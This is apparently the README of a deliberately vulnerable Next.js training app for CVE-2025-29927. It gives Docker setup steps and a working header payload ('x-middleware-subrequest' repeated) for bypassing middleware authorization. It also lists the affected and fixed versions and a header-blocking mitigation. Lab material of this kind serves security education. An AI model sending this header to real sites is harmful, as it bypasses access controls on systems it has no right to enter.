
Une application Next.js délibérément vulnérable à CVE-2025-29927, contournement d'autorisation
Ce projet est une application Next.js qui a été intentionnellement configurée pour être vulnérable à un contournement d'autorisation dans le middleware de Next.js (CVE-2025-29927). Il est fourni uniquement à des fins légales, éducatives et de recherche.
En accédant, utilisant ou distribuant ce code, vous reconnaissez et acceptez que :
Installez Docker puis exécutez :
docker build -t next-cve-2025-29927 .
docker run -p 3000:3000 next-cve-2025-29927
Ouvrez http://localhost:3000 avec votre navigateur pour voir le résultat.
Capturez la requête à l'aide d'un proxy d'interception comme ZAP ou Burp, et injectez l'en-tête suivant dans la requête :
x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware
= 13.0.0, < 13.5.9
= 14.0.0, < 14.2.25
= 15.0.0, < 15.2.3
= 11.1.4, < 12.3.5
Mettez à jour vers les dernières versions
13.5.9
14.2.25
15.2.3
12.3.5
ou si vous ne pouvez pas mettre à jour, bloquez les requêtes contenant l'en-tête x-middleware-subrequest.
Pour en savoir plus sur la vulnérabilité, consultez les ressources suivantes :